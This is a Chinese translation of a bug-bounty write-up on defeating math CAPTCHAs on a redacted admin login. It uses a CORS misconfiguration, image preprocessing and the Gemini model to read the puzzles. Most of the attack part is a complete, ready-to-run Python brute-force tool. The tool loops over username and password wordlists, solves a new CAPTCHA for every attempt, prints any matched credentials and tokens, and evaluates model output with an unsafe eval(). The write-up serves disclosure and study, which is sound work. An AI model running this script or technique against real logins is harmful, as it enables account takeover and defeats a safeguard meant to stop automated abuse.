利用AI模型绕过CAPTCHA

文化 2024-11-20 12:03 韩国

扫码领资料

获网安教程

来Track安全社区投稿~

赢千元稿费！还有保底奖励~（https://bbs.zkaq.cn）

通过AI绕过CAPTCHA揭示了潜在的漏洞，暴露了Web安全中的关键缺陷。

大家好，我是 ph-hitachi，一名全栈开发工程师、DevOps工程师兼安全研究员，同时拥有自动化工程与漏洞赏金自动化的经验。今年，我致力于探索新的攻击向量，重点研究如何利用现代工具与技术，以及黑客可能如何利用这些技术进行攻击与利用。

引言：

随着自动化的兴起，AI驱动的技术取得了显著进步，这些技术在网络安全中的应用也日益广泛。最近，我遇到了一种使用AI技术进行攻击而非保护系统的情况。这篇文章将详细说明如何使用AI模型，特别是生成式AI，绕过CAPTCHA防护，并接管一个Web应用程序中的账户。

什么是CAPTCHA？

CAPTCHA，全称为完全自动化公共图灵测试用于区分计算机和人类（Completely Automated Public Turing test to tell Computers and Humans Apart），是一种广泛使用的安全机制，旨在保护在线服务免受诸如暴力破解、凭据填充和机器人活动等自动化滥用行为的侵害。
通常，CAPTCHA挑战会提供一项对人类容易但对机器人困难的任务，例如识别图片中的物体、辨认扭曲的文字或解决基础数学问题。

CAPTCHA的主要功能是阻止自动化脚本或机器人执行有害操作，例如反复尝试用户名和密码组合，直到找到有效匹配。然而，CAPTCHA的防御仅在无法被绕过或自动解决时才有效。

测试概览：

我们使用了手动与自动化工具相结合的方法对平台进行了测试。测试过程包括以下步骤：

1.从服务器提取CAPTCHA图像。

2.使用AI模型自动解决CAPTCHA图像。

3.通过“集群炸弹”方法测试登录页面的抗暴力破解能力。

漏洞发现概述：

img

第一步：识别CAPTCHA端点的CORS配置错误

发现此漏洞的第一步是测试 {BASE_URL}/admin-web/captcha/show 端点的安全性。在测试中，我发现该端点存在CORS（跨域资源共享）配置错误，允许未经授权的来源访问敏感资源，例如CAPTCHA图像。

img

通过从一个不受信任的域发送简单的HTTP请求，我能够在没有任何服务器端来源验证的情况下获取CAPTCHA图像。

POST /admin-web/captcha/show HTTP/2Host: [redacted].comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Accept: application/json, text/plain, */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brReferer: [redacted].comContent-Type: application/x-www-form-urlencodedContent-Length: 10Origin: http://attacker.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailers
sysId=1000

HTTP/2 200 OKContent-Type: application/jsonDate: Tue, 01 Oct 2024 01:28:11 GMTX-Trace-Id: i100,i101001a441232779d64e6f88ea3b2040cfb43aVary: OriginVary: Access-Control-Request-MethodVary: Access-Control-Request-HeadersAccess-Control-Allow-Origin: http://attacker.comAccess-Control-Expose-Headers: Set-CookieAccess-Control-Allow-Credentials: trueX-Cache: Miss from cloudfront
{"img":"/9j/4AAQSkZJRgABAgAAAQABAAD(truncated)...","key":"code_xxxxxxxxxxx"}

这一被暴露的CAPTCHA图像成为攻击的切入点，因为它可以被自动获取并进行处理。

img

第二步：测试认证流程

在确认CAPTCHA暴露后，下一步是分析认证流程。我针对 {BASE_URL}/admin-web/auth/authInfo 端点进行测试，该端点负责验证用户凭据。每次登录请求都需要提供用户名、密码，以及最新的CAPTCHA解答。

img

一旦发送请求，服务器会返回响应，指示登录是否成功。

•loginName: 在暴力破解攻击中测试的用户名。

•loginPassword: 测试的密码。

•captchaCode: CAPTCHA解答（例如：CAPTCHA文本为6+3，解答为captchaCode）。

•captchaKey: 从初始CAPTCHA请求中获取的密钥。

img

第三步：使用AI模型解决CAPTCHA

最初，当尝试使用AI模型解决CAPTCHA时，我注意到默认的CAPTCHA图像由于图像质量较差而导致解答错误。CAPTCHA呈现的是简单的数学公式，如6 + 4，但AI将其错误地解释为一串数字（例如"6743"），而不是正确地解决该公式。

img

为了解决这个问题，我应用了图像预处理技术来提高CAPTCHA的清晰度，从而使AI能够以100%的准确率读取CAPTCHA。关键是将图像转换为黑白格式并进行锐化处理。我参考了以下命令来实现这一效果 https://mathieularose.com/decoding-captchas:

img

$ convert captcha_image.png -gaussian-blur 0 -threshold 25% -paint 1 captcha_image-1.png

img

通过应用高斯模糊、阈值处理和涂鸦操作，图像的边缘得到了锐化，噪声得到了减少，使得验证码对AI模型更加易读。

在对图像进行预处理后，AI模型始终能准确地生成结果，正确地解决数学方程式，如 6 + 4。这一步在自动化验证码解答过程中的高准确度至关重要。

步骤 4：使用Python脚本解答验证码

在从易受攻击的端点获取验证码图像并通过AI模型解答后，下一步是通过脚本化该过程实现自动化。

img

•步骤 5：暴力破解攻击实现：使用字典列表，对登录端点执行暴力破解攻击，利用提取的验证码代码和密钥。

脚本实现概述

步骤 1：发送第一次HTTP请求以获取验证码：

•向 /admin-web/captcha/show 发送 POST 请求，以获取验证码图像（作为Base64编码的字符串）及其对应的密钥。

步骤 2：解码图像并进行处理：

•使用响应中的Base64图像数据，按照上述方式使用Pillow图像处理库进行处理，并使用AI模型从验证码图像中提取文本。

步骤 3：解答验证码：

•解析AI模型输出的文本。如果文本表示数学问题（例如6 + 4 = ?），则解算该方程得到验证码答案。

步骤 4：使用字典攻击进行暴力破解：

•发送POST请求到 /admin-web/auth/authInfo，使用不同的用户名和密码组合，其中包括验证码答案（captchaCode）和验证码密钥（captchaKey，来自步骤1）。

img

demo脚本：

#/bin/python
import requestsimport base64from PIL import Image, ImageFilterfrom io import BytesIOimport osimport reimport argparseimport time  # Import time for delayfrom colorama import init, Fore, Stylefrom tqdm import tqdm  # Import tqdm for the real-time progress barfrom google.api_core.exceptions import ResourceExhausted  # Import the exception
# Initialize coloramainit(autoreset=True)
# Configure API key for Google Generative AIimport google.generativeai as genaigenai.configure(api_key=os.environ['GEMINI_API_KEY'])
# Define constantsBASE_URL = "https://[REDACTED].com"CAPTCHA_URL = f"{BASE_URL}/admin-web/captcha/show"AUTH_URL = f"{BASE_URL}/admin-web/auth/authInfo"SYS_ID = "1000"  # System ID
RETRY_LIMIT = 5  # Set a retry limit for handling quota exhaustion
# Step 1: Send First HTTP Request to Get the Captchadef get_captcha():    payload = {'sysId': SYS_ID}    response = requests.post(CAPTCHA_URL, headers={        'Content-Type': 'application/x-www-form-urlencoded'    }, data=payload)
    if response.status_code == 200:        return response.json()    else:        raise Exception("Failed to retrieve CAPTCHA")
# Step 2: Decode the Image and Apply Gaussian blur, thresholding, and paintingdef process_captcha(captcha_data):    # Decode the base64 image    image_data = base64.b64decode(captcha_data["img"])    image_pil = Image.open(BytesIO(image_data))
    # Image Processing    image_blurred = image_pil.filter(ImageFilter.GaussianBlur(0))  # No blur    image_gray = image_blurred.convert("L")    threshold_value = 64    image_threshold = image_gray.point(lambda p: p > threshold_value and 255)
    # Optional: Enhance and smooth the image    image_painted = image_threshold.filter(ImageFilter.EDGE_ENHANCE).filter(ImageFilter.SMOOTH)
    return image_painted
# Step 3: Solve the Captchadef solve_captcha(image, retry_count=0):    # Generate the content using the AI model    prompt = "Extract the text from this image."    model = genai.GenerativeModel(model_name="gemini-1.5-flash")
    try:        response = model.generate_content([prompt, image])
        # Check if the response has candidates and extract the text        if response.candidates and response.candidates[0].content.parts:            generated_text = response.candidates[0].content.parts[0].text.strip()  # Extract the text            return generated_text        else:            print(f"\n{Fore.RED}Error: CAPTCHA solving was not successful for reason: {response.candidates.finish_reason}")            return None    except ResourceExhausted as e:        # Handle resource exhaustion by retrying with a delay        if retry_count < RETRY_LIMIT:            print(f"\n{Fore.RED}Quota exceeded. Retrying in 30 seconds... (Attempt {retry_count + 1}/{RETRY_LIMIT})")            time.sleep(30)  # Wait for 60 seconds before retrying            return solve_captcha(image, retry_count + 1)        else:            print(f"\n{Fore.RED}Quota exhausted and retry limit reached. Exiting.")            exit(1)    except AttributeError as e:        # Handle attribute error in case of incorrect response fields        print(f"\n{Fore.RED}AttributeError: Possibly incorrect field in the response. Check for proper API handling.")        print(f"\nError details: {e}")        return None
# Evaluate a math expressiondef evaluate_math_expression(expression):    try:        result = eval(expression)        return str(result)    except Exception as e:        print(f"\nError evaluating expression: {e}")        return None
# Step 4: Use a Cluster Bomb Attack with Wordlistdef brute_force_login(username, password, attempt_count, total_attempts, progress_bar):    # Get a new CAPTCHA for every login attempt    captcha_data = get_captcha()    captcha_image = process_captcha(captcha_data)    captcha_text = solve_captcha(captcha_image)
    # Check if the CAPTCHA was successfully solved    if captcha_text is None:        print(f"\n{Fore.RED}Failed to solve CAPTCHA. Skipping this attempt.")        return  # Skip this login attempt
    # Find the math expression in the text    math_expression = re.search(r'(\d+\s*[\+\-\*\/]\s*\d+)', captcha_text)
    if math_expression:        captcha_code = evaluate_math_expression(math_expression.group(0))        captcha_key = captcha_data["key"]
        # Construct the payload for login attempt        payload = {            'loginName': username,            'loginPassword': password,            'sysId': SYS_ID,            'captchaCode': captcha_code,            'captchaKey': captcha_key,            'loginVersion': 'v5',            'noTgAuth': 'v1'        }
        # Make the login attempt request        response = requests.post(AUTH_URL, headers={            'Content-Type': 'application/x-www-form-urlencoded'        }, data=payload)
        response_json = response.json()
        # Only print success messages (when the response content is greater than 2000 bytes)        if len(response.content) > 2000:  # Check if response size is greater than 2000 bytes            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.GREEN + f"TraceID: {Fore.YELLOW}{response_json.get('traceId', 'N/A')}")            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.GREEN + "Credentials match:")            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"Username: {Fore.GREEN}{username}")            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"Password: {Fore.GREEN}{password}")            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"Captcha Content: {Fore.GREEN}{math_expression.group(0)}")            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"Captcha Code: {Fore.GREEN}{captcha_code}")            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"Captcha Key: {Fore.GREEN}{captcha_key}")            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.GREEN + "User Information:")            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"Merchant ID: {Fore.GREEN}{response_json['data'].get('merId', 'N/A')}")            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"User Name: {Fore.GREEN}{response_json['data'].get('loginName', 'N/A')}")            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"User ID: {Fore.GREEN}{response_json['data'].get('userId', 'N/A')}")            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"Role ID: {Fore.GREEN}{response_json['data'].get('roleId', 'N/A')}")            tqdm.write(Fore.BLUE + f"[{Fore.CYAN}+{Fore.BLUE}] " + Fore.YELLOW + f"X-Token: {Fore.GREEN}{response_json['data'].get('token', 'N/A')}")
            return response_json
    # Update progress bar for failed attempts (without printing the failure message)    progress_bar.update(1)
    # Introduce delay between each brute force attempt to avoid overloading the API    # time.sleep(REQUEST_DELAY)
# Load usernames or passwords from a filedef load_wordlist(file_path):    with open(file_path, 'r') as file:        return [line.strip() for line in file.readlines()]
# Main executionif __name__ == "__main__":    parser = argparse.ArgumentParser(description='Brute force login script with CAPTCHA solving.')    parser.add_argument('--username', required=True, help='Path to the file containing usernames (one per line) or a single username string.')    parser.add_argument('--password', required=True, help='Path to the file containing passwords (one per line) or a single password string.')
    args = parser.parse_args()
    # Load username and password wordlists or single strings    username_list = load_wordlist(args.username) if os.path.isfile(args.username) else [args.username]    password_list = load_wordlist(args.password) if os.path.isfile(args.password) else [args.password]
    total_attempts = len(username_list) * len(password_list)    attempt_count = 0
    # Initialize progress bar    with tqdm(total=total_attempts, desc="Brute Force Attack", ncols=100, ascii=True, colour="yellow") as progress_bar:        # Perform brute-force login attempts        for username in username_list:            for password in password_list:                brute_force_login(username, password, attempt_count, total_attempts, progress_bar)                attempt_count += 1

以上内容由白帽子左一翻译并整理。原文：https://infosecwriteups.com/utilizing-ai-model-for-hacking-bypassing-captchas-using-ai-leads-to-account-takeover-bug-bounty-028804b779a0

声明：⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤，任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的，否则后果⾃⾏承担。所有渗透都需获取授权！

如果你是一个网络安全爱好者，欢迎加入我的知识星球：zk安全知识星球,我们一起进步一起学习。星球不定期会分享一些前沿漏洞，每周安全面试经验、SRC实战纪实等文章分享，微信识别二维码，即可加入。

http://mp.weixin.qq.com/s?__biz=MzI4NTcxMjQ1MA==&mid=2247614201&idx=1&sn=d003b1c510d4481ce86a92f2f05d8a29

白帽子左一

零基础也能学渗透！关注我，跟我一启开启渗透测试工程师成长计划.专注分享网络安全知识技能.